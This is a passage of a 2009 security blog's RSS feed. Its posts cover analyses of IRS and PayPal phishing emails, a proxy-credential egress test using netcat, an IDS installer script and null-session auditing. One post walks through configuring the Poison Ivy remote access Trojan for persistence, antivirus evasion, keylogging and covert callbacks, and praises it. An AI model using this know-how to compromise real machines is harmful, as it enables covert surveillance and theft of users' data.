		<link>http://www.digitaloffensive.com/2009/09/blackberry-firewall-guide/</link>
		<comments>http://www.digitaloffensive.com/2009/09/blackberry-firewall-guide/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 15:01:06 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=16</guid>
		<description><![CDATA[BlackBerry Firewall guide A few months ago I wrote for Informit.com and had my buddy Seth Fogie publish my article that I wrote on the BlackBerry Firewall. You can find the article here: http://www.informit.com/guides/content.aspx?g=security&#38;seqNum=348]]></description>
			<content:encoded><![CDATA[<p>BlackBerry Firewall guide</p>
<p>A few months ago I wrote for Informit.com and had my buddy Seth Fogie publish my article that I wrote on the BlackBerry Firewall. You can find the article here:</p>
<p><a title="http://www.informit.com/guides/content.aspx?g=security&amp;seqNum=348" href="http://www.informit.com/guides/content.aspx?g=security&amp;seqNum=348" target="_blank">http://www.informit.com/guides/content.aspx?g=security&amp;seqNum=348</a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fblackberry-firewall-guide%2F&amp;title=BlackBerry%20Firewall%20guide" id="wpa2a_112"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/blackberry-firewall-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Authentication Proxies: Secure or Not?</title>
		<link>http://www.digitaloffensive.com/2009/09/authentication-proxies-secure-or-not/</link>
		<comments>http://www.digitaloffensive.com/2009/09/authentication-proxies-secure-or-not/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 15:00:41 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=18</guid>
		<description><![CDATA[Authentication Proxies: Secure or Not? A while back I wrote on cached credentials and proxy authentication in regards to spyware. Well I rewrote the paper and cleaned it up a bit. I then had informit.com publish it for me. to see it check out the url below.  This one includes the .net code to make [...]]]></description>
			<content:encoded><![CDATA[<p>Authentication Proxies: Secure or Not?</p>
<p>A while back I wrote on cached credentials and proxy authentication in regards to spyware. Well I rewrote the paper and cleaned it up a bit. I then had informit.com publish it for me. to see it check out the url below.  This one includes the .net code to make it work.</p>
<p><a title="http://www.informit.com/guides/content.aspx?g=security&amp;seqNum=350" href="http://www.informit.com/guides/content.aspx?g=security&amp;seqNum=350" target="_blank">http://www.informit.com/guides/content.aspx?g=security&amp;seqNum=350</a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fauthentication-proxies-secure-or-not%2F&amp;title=Authentication%20Proxies%3A%20Secure%20or%20Not%3F" id="wpa2a_114"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/authentication-proxies-secure-or-not/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fun with Poison Ivy</title>
		<link>http://www.digitaloffensive.com/2009/09/fun-with-poison-ivy/</link>
		<comments>http://www.digitaloffensive.com/2009/09/fun-with-poison-ivy/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 15:00:07 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=30</guid>
		<description><![CDATA[Fun with Poison Ivy Poison Ivy is a remote access Trojan (Tool) that can be found at the following URL: http://poisonivy-rat.com and a support forum can be found here http://ratforge.net/forums/ . Please note that these are Trojans and www.digitaloffensive.com nor any of its staff are responsible for any use or misuse that you do with [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Fun with Poison Ivy</strong></p>
<p>Poison Ivy is a remote access Trojan (Tool) that can be found at the following URL: <a title="http://poisonivy-rat.com" href="http://poisonivy-rat.com" target="_blank">http://poisonivy-rat.com</a> and a support forum can be found here <a title="http://ratforge.net/forums/" href="http://ratforge.net/forums/" target="_blank">http://ratforge.net/forums/</a> . Please note that these are Trojans and www.digitaloffensive.com nor any of its staff are responsible for any use or misuse that you do with these files.</p>
<p>Recently I had the opportunity to take a close look at the poison ivy rat and run it through a real world scenario in a controlled lab environment. The tool comes as a single exe that allows you to build a server executable from variables you select in the GUI configuration under the new server option. Neither the client nor the server was detected by Norton, McAfee, AVG or trend. This may have been that the version I was using was released only a day earlier.  I did find it a bit weird that inside Vmware that it would not run and would constantly crash. This made me think right away that the creator did not want their code analyzed but a quick Google showed that many people had this issue which was quickly fixed by disabling DEP.</p>
<p>One of the biggest reasons I loved this Trojan so much was that it provided us with a shoveled shell / connection. This means that no matter what ports where open inbound on their firewall we were guaranteed access because most of them were not doing egress filtering.  Poison Ivy provided an easy and repeatable server creation process using profiles to easily save and quickly load your favorite configurations. The wizard walks you through each step asking you what you would like to choose. Screen 1 we created our connections which is where we put in the phone home IP or IP’s as well as the shared password. Screen 2 walks you through the install options: IE. Run on startup, place in registry, place in active control, copy itself to folders and more. The third screen provides the advance features options. Here we can change its mutex name so we can run multiple instances of poison ivy on each machine, inject the Trojan into the browser, make it persistent, inject it into running process and my favorite hide in ADS (alternate data streams, thank you Microsoft). The 4th menu allows you to add additional build features such as an external packer to hide it from AV better. The final screen is actual generation of the Trojan server executable.</p>
<p>In the lab we used core impact as well as several other commercial and non commercial exploit tools to gain access to the machines and install poison ivy. Once we had poison ivy installed we were able to view the users screen in near real time by changing the screen shot capture to 5 seconds (don’t suggest doing this over a internet connection), record all the key logs they typed, spawn remote shells, control processes and services as well as countless other things. One of the other real good things it did was to show us in red every place it had hooked in so we can make sure we did not accidentally kill it while killing other processes or files. Once installed poison ivy was able to maintain our access through the day even when it was killed it would re-spawn itself and connect back to us letting us know it was alive.<br />
The only down fall of Poison Ivy was that since it is connect back Trojan the user has the ability to find our IP and to block it in the firewall. Though there are several ways around this. The one that is built into Poison Ivy is to be able to update the code on the fly by replacing the exe with a newly compiled one allowing it to talk back to a new IP or FQDN.</p>
<p>In short I would like to give kudos to the Poison Ivy team for a fine crafted tool and for supplying us several hours of fun while remaining UN detected by AV.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Ffun-with-poison-ivy%2F&amp;title=Fun%20with%20Poison%20Ivy" id="wpa2a_116"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/fun-with-poison-ivy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CACHED CREDENTIALS, PROXY AUTHENTICATION and SPYWARE OH MY!</title>
		<link>http://www.digitaloffensive.com/2009/09/cached-credentials-proxy-authentication-and-spyware-oh-my/</link>
		<comments>http://www.digitaloffensive.com/2009/09/cached-credentials-proxy-authentication-and-spyware-oh-my/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 14:58:00 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=12</guid>
		<description><![CDATA[CACHED CREDENTIALS, PROXY AUTHENTICATION and SPYWARE OH MY! Recently a client of mine and I had a long winded debate about the dangers of not protecting machines from spyware and other malware. The client swore up and down that since they had an authenticating proxy that required the windows cached credentials to access the internet [...]]]></description>
			<content:encoded><![CDATA[<p><strong>CACHED CREDENTIALS, PROXY AUTHENTICATION and SPYWARE OH MY! </strong></p>
<p>Recently a client of mine and I had a long winded debate about the dangers of not protecting machines from spyware and other malware. The client swore up and down that since they had an authenticating proxy that required the windows cached credentials to access the internet that they were protected. They believed that the proxy prevented the spyware and other malware from being able to phone data home as the spyware would not have access to the cache credentials to access the internet. We spent a lot of time searching for spyware or other malware that were known that could use windows cached credentials and could not find any. The results that we did come up with were articles on how using an authenticating proxy helps cuts down on spyware and other malware as they cannot phone home.  Even though all the data was pointing to me being wrong I knew if it did not currently exist that as spyware evolved it would exist.</p>
<p>Even though I continued to argue my points and tried to provide relevant supporting data to back my concerns up they were still firm that spyware is not an issue. So I set forth to prove them wrong. I remembered back in the day when I use to write applications in Visual Basic that you could make a web browser in just a few minutes. Visual Basic allows you to do this through the web browser component, which uses the Internet Explorer engine. With this in mind I formulated my first theory. The theory was if it used Internet Explorer then it should use cached credentials to authenticate too without the need to steal them or anything else. To test this out I wrote a quick web browser using the web component in Visual Basic. Once I completed the code I disabled the proxy in Internet Explorer to make sure that without that checked I did not have internet access. Once I verified I did not have internet access I launched my web browser that I just coded and witnessed the same thing. With this tested I then re-enabled the proxy settings in Internet Explorer and repeated the test again. This time both Internet Explorer and the web browser I built connected to the internet. With the theory of my web browser using the cached credentials proven correct I moved on to actually sending data out through the proxy /firewall. To accomplish this I decided to use the “http post” command as it will allow me to submit data to a form over port 80 using the http protocol which is allowed through the proxy / firewall for authenticated users. To do this I found an old “shoutbox” script and used “live http headers” for Firefox to see how a post looked. Once I captured the posting header I broke it down in my application into 2 parts. Part one was the post string and part 2 was the data I recorded from user input. Once I clicked the execute button the data was posted to the shoutbox application and my theory was proven fact.</p>
<p>To double verify my theory I ran a second set of tests:</p>
<p>Test 2: Using Raw packet tools to test my theory.</p>
<p>Without firewall rule allowing me to bypass the proxy</p>
<p>C:\&gt;nc -vv xxxx.net 80</p>
<p>DNS fwd/rev mismatch: xxxx.net != lambda.xxxxxxx.com</p>
<p>xxxxx.net [xxx.xxx.xxx.xxx] 80 (http): TIMEDOUT &lt; &#8212; Failed</p>
<p>sent 0, rcvd 0: NOTSOCK</p>
<p>As you can see when I have to use the proxy Netcat can’t automatically authenticate to the proxy hence my http connection to xxxxx.net fails.</p>
<p>With firewall rule allowing me to bypass the proxy</p>
<p>C:\&gt;</p>
<p>C:\&gt;nc -vv xxxxx.net 80</p>
<p>DNS fwd/rev mismatch: xxxx.net  != lambda.xxxxxx.com</p>
<p>xxxxxx.net [xxx.xxx.xxx.xxx] 80 (http) open &lt;&#8211; Worked</p>
<p>C:\&gt;</p>
<p>As you can see with the rule allowed in the firewall to allow me to bypass the proxy and use the firewall the Netcat application can connect via http to xxxxx.net since it does not have to authenticate.</p>
<p>In the wild a malicious person could use a vulnerability in Internet explorer to download the application and execute it in the background or they could email it to a user and have them run it. The application does not require admin rights all it needs is the ability to use Internet Explorer.</p>
<p>I will upload the POC once I show the company my findings later this week. IP and URL&#8217;s have been altered to protect them.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fcached-credentials-proxy-authentication-and-spyware-oh-my%2F&amp;title=CACHED%20CREDENTIALS%2C%20PROXY%20AUTHENTICATION%20and%20SPYWARE%20OH%20MY%21" id="wpa2a_118"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/cached-credentials-proxy-authentication-and-spyware-oh-my/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The IRS has partnered up with China to help you get a tax bonus!</title>
		<link>http://www.digitaloffensive.com/2009/09/the-irs-has-partnered-up-with-china-to-help-you-get-a-tax-bonus/</link>
		<comments>http://www.digitaloffensive.com/2009/09/the-irs-has-partnered-up-with-china-to-help-you-get-a-tax-bonus/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 14:50:22 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=14</guid>
		<description><![CDATA[The IRS has partnered up with China to help you get a tax bonus! As some of you know my day job has me providing security guidance to a large user base that vary in their technical skills. Every day we get several requests that come in asking us weather something is a scam or [...]]]></description>
			<content:encoded><![CDATA[<p><strong>The IRS has partnered up with China to help you get a tax bonus! </strong></p>
<p>As some of you know my day job has me providing security guidance to a large user base that vary in their technical skills. Every day we get several requests that come in asking us weather something is a scam or phishing attempt and when time allows we do the research.</p>
<p>Today’s phishing question had to do with the following email:</p>
<p>From: Internal Revenue Service (IRS) [mailto: taxrefund@0x6c.3xdb24d6.irs.govThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ]<br />
Sent: Tuesday, May 20, 2008 7:25 AM<br />
Subject: Tax Notification</p>
<p>Internal Revenue Service (IRS)<br />
United States Department of the Treasury</p>
<p>Dear Taxpayer,</p>
<p>After the last annual calculations of your fiscal<br />
activity we have determined that you are eligible<br />
to receive a tax refund of $184.80.</p>
<p>Please submit the tax refund request and allow us<br />
6-9 days in order to process it.</p>
<p>A refund can be delayed for a variety of reasons.<br />
For example submitting invalid records or applying<br />
after the deadline.</p>
<p>To access the form for your tax refund, use the following personalized link:</p>
<p>http://0x7C.0xDB11D1/www.irs.gov/</p>
<p>Regards,<br />
Internal Revenue Service</p>
<p>Document Reference: (0x7C.0xDB11D1).</p>
<p>I did some quick initial research and replied to the end user with the following information:</p>
<p>From: Internal Revenue Service (IRS) [mailto: taxrefund@0x6c.3xdb24d6.irs.govThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ]<br />
Sent: Tuesday, May 20, 2008 7:25 AM<br />
Subject: Tax Notification</p>
<p>Unfortunately we do not have the full headers here so I cannot confirm or deny the email address above. But I can tell you just looking at it does look real suspicious.</p>
<p>Internal Revenue Service (IRS)<br />
United States Department of the Treasury</p>
<p>Dear Taxpayer,</p>
<p>The IRS knows you and would address you by your full name. IE John Smith  not Dear Taxpayer</p>
<p>After the last annual calculations of your fiscal<br />
activity we have determined that you are eligible<br />
to receive a tax refund of $184.80.</p>
<p>Please submit the tax refund request and allow us<br />
6-9 days in order to process it.</p>
<p>In the past whenever the IRS has owed a individual additional money / rebates they never required additional requests. IE the recent bonus rebates.</p>
<p>A refund can be delayed for a variety of reasons.<br />
For example submitting invalid records or applying<br />
after the deadline.</p>
<p>To access the form for your tax refund, use the following personalized link:</p>
<p>http://0x7C.0xDB11D1/www.irs.gov/</p>
<p>This web address is bogus. The IRS real site is http://www.irs.gov. If you Google the address you will find these links http://www.google.com/search?hl=en&amp;q=0x7C.0xDB11D1 showing that this is indeed a scam.<br />
According to this site the url no longer works though I do not suggest you click it. http://www.phishtank.com/phish_detail.php?phish_id=448690&amp;frame=site. That link will allow you to see the site in a protective format if you hover over the links on the site you will see that many of them do not go to the IRS site.</p>
<p>It is my believe that the 0x7C.0xDB11D1 is another url encrypted with hexadecimal (a computer language) that basically uses some form of cross site scripting, site spoofing, or redirection to steal your information.</p>
<p>Regards,<br />
Internal Revenue Service</p>
<p>Document Reference: (0x7C.0xDB11D1).</p>
<p>Though the response above works for our end users this interested me so I decided to research this further. I figured looking at the URL that the phishers have came up with a new way or was using an old way that stilled worked to obfuscate the URL.</p>
<p>(Before doing any of the below please make sure you are using a live boot cd or a machine that you do not care about. I am not responsible if you infect yourself.)</p>
<p>So first I wanted to decrypt the URL http://0x7C.0xDB11D1. So using a hexadecimal conversion sheet that I found at http://www.dewassoc.com/support/msdos/decimal_hexadecimal.htm<br />
I was able to translate the obfuscated URL to the IP address 124.219.17.209. You could also decrypt this by using the ping –a command. It will resolve it to the IP address.</p>
<p>Second I used Wire shark to capture traffic to and from the site to see if it used any droppers or scripts for redirection or infection. I did not see anything out of the ordinary.</p>
<p>Third I used Firefox and the Live Http Headers plug-in to capture traffic to and from the site to see if there were any scripts or redirection taken place and I did not see anything.</p>
<p>Fourth I manually analyzed the source code of the http:// 0x7C.0xDB11D1/ and the redirected site codes and did not see anything in the code that was obfuscated or out of the norm. The hacked pages pulled a lot of the IRS images and style sheets to make it look like the real thing but the attacker did an extremely poor job of hiding the URL. The URL clearly is not that of the IRS.</p>
<p>Fifth I manually tried to change the URL instead of using http:// 0x7C.0xDB11D1/www.irs.gov I tried http:// 0x7C.0xDB11D1/www.digitaloffensive.com and I got a page cannot be found error. This makes me believe that on the site http:// 0x7C.0xDB11D1 (124.219.17.209) there is a subfolder called www.irs.gov that has a file in it that does the redirection to random sites. I say random sites because during my analyst of this issue two different redirected hacked URL’s showed up. I tried to mirror the site http:// 0x7C.0xDB11D1 with wget –rm http:// 0x7C.0xDB11D1 but most of the directories cannot be accessed. I even tried to mirror it by doing wget –rm http:// 0x7C.0xDB11D1/www.irs.gov/ and that was able to dl one of the other hacked sites but still not provide the redirection source.</p>
<p>In conclusion this is just another phishing scam where the attackers are relying on human stupidity to click on a link and supply their personal information to the attackers. Please head your IT / IS department warnings about Email scams as they are only trying to protect you from yourself.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fthe-irs-has-partnered-up-with-china-to-help-you-get-a-tax-bonus%2F&amp;title=The%20IRS%20has%20partnered%20up%20with%20China%20to%20help%20you%20get%20a%20tax%20bonus%21" id="wpa2a_120"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/the-irs-has-partnered-up-with-china-to-help-you-get-a-tax-bonus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>More IRS Shenanigans</title>
		<link>http://www.digitaloffensive.com/2009/09/more-irs-shenanigans/</link>
		<comments>http://www.digitaloffensive.com/2009/09/more-irs-shenanigans/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 14:45:14 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=10</guid>
		<description><![CDATA[More IRS Shenanigans Today our director of Internal Audit dropped on my desk a printed email that looked exactly the same as the scam email I wrote about a few weeks ago in the post called “The IRS has partnered up with China to help you get a tax bonus!”. I figured since I had [...]]]></description>
			<content:encoded><![CDATA[<p><strong>More IRS Shenanigans</strong></p>
<p>Today our director of Internal Audit dropped on my desk a printed email that looked exactly the same as the scam email I wrote about a few weeks ago in the post called “The IRS has partnered up with China to help you get a tax bonus!”. I figured since I had a huge increase in traffic since I did the original story from people searching for what 0x7C.0xDB11D1 was that I would do a follow up to help others out that may be seeing this for the first time.</p>
<p>This time however the amount is no longer 184.80 they are now saying you are entitled to a whopping 284.80 cents an increase of $100.00 dollars.</p>
<p>The URL has changed slightly instead of http://0x7C.0xDB11D1/www.irs.gov/ it is now http://2081062820/www.irs.gov/. The new URL uuencoded is http://124.10.127.164/www.irs.gov/. At the time of this writing it looks like the URL has been removed and is no longer working to con innocent people out of their information. To see how I decoded the URL please read the original story posted here http://www.digitaloffensive.com/index.php?option=com_content&amp;task=view&amp;id=23&amp;Itemid=2 .</p>
<p>The third change was the “Document Reference Number”. In both emails this number was just the obfuscated URL to make it look more official and lend assistance in making the phish fall for the bait easier. In the first mail the “Document Reference Number” was 0x7C.0xDB11D1 and in the second one it was 2081062820.</p>
<p>Once again only way for us to help protect our end users is through constant reminders and training.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fmore-irs-shenanigans%2F&amp;title=More%20IRS%20Shenanigans" id="wpa2a_122"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/more-irs-shenanigans/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>I am not your Pal. How to detect PayPal-based phishing scams.</title>
		<link>http://www.digitaloffensive.com/2009/09/i-am-not-your-pal-how-to-detect-paypal-based-phishing-scams/</link>
		<comments>http://www.digitaloffensive.com/2009/09/i-am-not-your-pal-how-to-detect-paypal-based-phishing-scams/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 14:08:46 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=33</guid>
		<description><![CDATA[I am not your Pal. How to detect PayPal-based phishing scams. The term phishing originated by taking the term fishing, meaning to bait and catch, and using a language of the computer underground where they commonly replace the letter F with PH. Digital criminals use cunning techniques to trick their victims into taking the bait [...]]]></description>
			<content:encoded><![CDATA[<p><strong>I am not your Pal. How to detect PayPal-based phishing scams.</strong></p>
<p>The term phishing originated by taking the term fishing, meaning to bait and catch, and using a language of the computer underground where they commonly replace the letter F with PH. Digital criminals use cunning techniques to trick their victims into taking the bait … hook, line and sinker! The victim usually ends up exposing themselves to identity theft, loss of funds and other unpleasant consequences.</p>
<p>Though many companies like PayPal and eBay take many security measures to protect you it’s the human factor, known as Social Engineering, which these predators are counting on. They’re hoping to trick you mentally into believing that they are who they say they are or if you don’t reply bad things will happen.</p>
<p>PayPal has published a list of common email phishing tactics and a list of ways to detect fake emails that can be viewed here:  https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Help/popup/RecognizeSpoof-outside . We strongly suggest that you read this information on PayPal’s website in its entirety, as it is only 3 pages long, but could save you time and money down the road.</p>
<p>Let’s take a look at the following email and see if you can point out the tell-tale signs that it’s a fake. The most important thing to remember, no matter how the email looks, is if you’re unsure of the email’s authenticity manually type in the company’s website and contact them via the phone number found on their site. This assures that you aren’t tricked into a fake site that may contain a fake number.</p>
<p>Another thing to remember is that if you do not have a PayPal account then just delete the email as it‘s definitely a trick.</p>
<p><img class="aligncenter size-full wp-image-34" title="p1" src="http://digitaloffensive.com/wp-content/uploads/2009/09/p1.jpg" alt="p1" width="624" height="403" /></p>
<p>Here are some tell-tale signs that will help you quickly identify a phishing attempt.</p>
<p>First, the From says PayPal Department but the actual email address is norelay@steelworks.orgThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it .  That’s not from the PayPal domain which should’ve been name@paypal.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it . There are ways to spoof the domain so just because the email has the real domain name don’t base its authenticity on just that.</p>
<p>Second, the message is addressed to Dear PayPal User. Though PayPal, eBay and many other large companies deal with millions, if not billions of people, they’ll always use the name that’s on your account. For example: John Bishop Smith or Jane Y Smith. They will never user a generic greeting.</p>
<p>The third tell-tale sign isn’t very noticeable to the naked eye. If you hover your mouse over the website address Outlook will either show a balloon pop up with the real website that it will take you to, if you clicked it, or it will show the real website address in the Outlook status bar at the bottom of Outlook.</p>
<p><img class="aligncenter size-full wp-image-35" title="p2" src="http://digitaloffensive.com/wp-content/uploads/2009/09/p2.jpg" alt="p2" width="561" height="83" /></p>
<p>The website address in the pop up doesn’t look like https://www.paypal.com at all! This can also be spoofed through other means to make the pop up show a PayPal website address.</p>
<p>Fourth is the content of the email. The attacker is trying to persuade you with a false sense of urgency to click the link. It’s better to have your account suspended than clicking the link.</p>
<p>To summarize whenever you receive these types of emails it’s best to delete them and contact the company through a manual process to assure that you are not being tricked into falling for a scam. We suggest that you manually type in the PayPal address https://www.paypal.com            to verify any information or call them at 1-888-221-1161.</p>
<p>I provided you with a few tell-tale signs to help protect you from falling victim to these attacks. If you have any questions or concerns please feel free to contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Fi-am-not-your-pal-how-to-detect-paypal-based-phishing-scams%2F&amp;title=I%20am%20not%20your%20Pal.%20How%20to%20detect%20PayPal-based%20phishing%20scams." id="wpa2a_124"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/i-am-not-your-pal-how-to-detect-paypal-based-phishing-scams/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Instant IDS v1.0</title>
		<link>http://www.digitaloffensive.com/2009/09/instant-ids-v1-0/</link>
		<comments>http://www.digitaloffensive.com/2009/09/instant-ids-v1-0/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 14:00:32 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=28</guid>
		<description><![CDATA[Instant IDS v1.0 Instant IDS v1.0 is a custom shell script that will automatically download, configure and run Snort IDS and BASE web gui. Though this script has been tested in-depth I the author do not guarantee it will work and or not harm your system. Since this is a shell script and can be [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Instant IDS v1.0</strong></p>
<p>Instant IDS v1.0 is a custom shell script that will automatically download, configure and run Snort IDS and BASE web gui.</p>
<p>Though this script has been tested in-depth I the author do not guarantee it will work and or not harm your system. Since this is a shell script and can be easily edited I strongly suggest that you don’t download it from any site but http://www.digitaloffensive.com. Please note that IDS systems need to configure to properly work in your environment. Until they are tuned you may receive false positives.</p>
<p>This script has been tested in-depth on CentOS 5.0, Fedora Core 7 and Fedora Core 6. This script should work on any other Linux flavor that makes use of yum and chkconfig.</p>
<p>This script currently makes use of the snort 2.7 and the rules that were released with this version. We do not download new rules for you as Snort requires a user account to download newer rules. We strongly suggest that if you like the Snort product that you subscribe to their subscription rule base service to receive new rules faster.</p>
<p><strong>What is needed?</strong></p>
<p>a)      A default install of Linux with gcc (no need to choose http, mysql or anything like that)</p>
<p>b)      A Internet Connection<br />
<strong><br />
What Does Instant IDS provide you?</strong></p>
<p>Instant IDS provides you with a fully functional IDS system in minutes. The script will download all needed services, libraries and packages that are needed. It will install and configure each of these items based on the underlying operating system. It will also configure and start the needed services based on user input. Once done it provides you with a fully working IDS system running Snort, MySql and BASE.</p>
<p><strong>What are we planning to do in the future?</strong></p>
<p>Since 96% of the script pulls the newest packages using yum we plan to make sure that we keep the script up to date as new versions of Snort, Base and Libpcap are released. We plan to make the script more customizable by introducing the ability to configure variables. We plan to add more advance means of error checking and improve the code. We also plan to have it lock down the box as much as possible based on user input. With all this said we rely on the users of the script to tell us what they like and don’t like and what they would like us to do in future releases.<br />
<strong><br />
How to use Instant IDS</strong></p>
<p>a)      cd /root</p>
<p>b)      wget http://www.digitaloffensive.com/snort/snort.sh</p>
<p>c)       chmod 777 snort.sh</p>
<p>d)      ./snort.sh</p>
<p>e)      Answer the questions that you are prompted with. Please make sure that if you are using a subnet that you enter it as xxx.xxx.xxx.xxx\\/24 ß or whatever class it is.</p>
<p>f)       The wait value you enter will give you some time to make sure there is no show stopping errors, some warning are ok. This is only to be used if there is a major issue and a library or application does not install or compile. If you see a major issue press ctrl +c to cancel the rest of the install.</p>
<p>g)      Once instant IDS is installed we suggest you lock down your machine, here are a few examples:</p>
<p>a.       Firewall the machine.</p>
<p>b.      Disable root ssh access.</p>
<p>c.       Create a mysql root password.</p>
<p>d.      Update the systems patches</p>
<p>e.      Disable unneeded services.</p>
<p>This script is released freely we ask that you keep the original authors information in it though you have right to modify the script as you see necessary. This script may not be sold.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2009%2F09%2Finstant-ids-v1-0%2F&amp;title=Instant%20IDS%20v1.0" id="wpa2a_126"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2009/09/instant-ids-v1-0/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Null Session Scanning</title>
		<link>http://www.digitaloffensive.com/2009/09/null-session-scanning/</link>
		<comments>http://www.digitaloffensive.com/2009/09/null-session-scanning/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 13:59:12 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://digitaloffensive.com/?p=26</guid>
		<description><![CDATA[Null Session Scanning For a recent audit I was tasked with checking a class C network for null sessions. The task itself sounds simple doesn’t it? But I am not one to just run a quick scan without verifying my work. This caused a interesting discovery. My first run at the network I used NTscan [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Null Session Scanning </strong></p>
<p>For a recent audit I was tasked with checking a class C network for null sessions. The task itself sounds simple doesn’t it? But I am not one to just run a quick scan without verifying my work. This caused a interesting discovery. My first run at the network I used NTscan and discovered 1 machine with a null session open. If this would of been correct then the client would of definitely improved their security posture since the last audit they had from another company. To verify my work I then ran xscan v3, though I prefer their older versions I could not find a working clean copy in the short time frame I had to use it. This scan returned 3 open machines. Now this was odd but I chalked it up to maybe another machine came up in the time frame it took to run the tools. The third scan I ran with a tool called netscan and this tool not only returned 16 machines open but returned all the drive information with their permissions. Now this totally baffled me, so I ran all three tools one after another and the same results came up. I also manually checked the machines that returned results and each one was indeed open. Now with this in mind I figured the only safest way to confirm what was truly open was to manual test the full class C using net commands. So to this I wrote a simple shell script for CYGWIN to verify the machine was up then to check it for null sessions. The script returned 26 null sessions, which I verified a sampling of them and confirmed my results. The script is attached. The script was not written with the ability to quickly change it with variables as I needed it quickly and did not have time to make it look real pretty. If you would like to customize the script please feel free to do it, or if you need help please feel 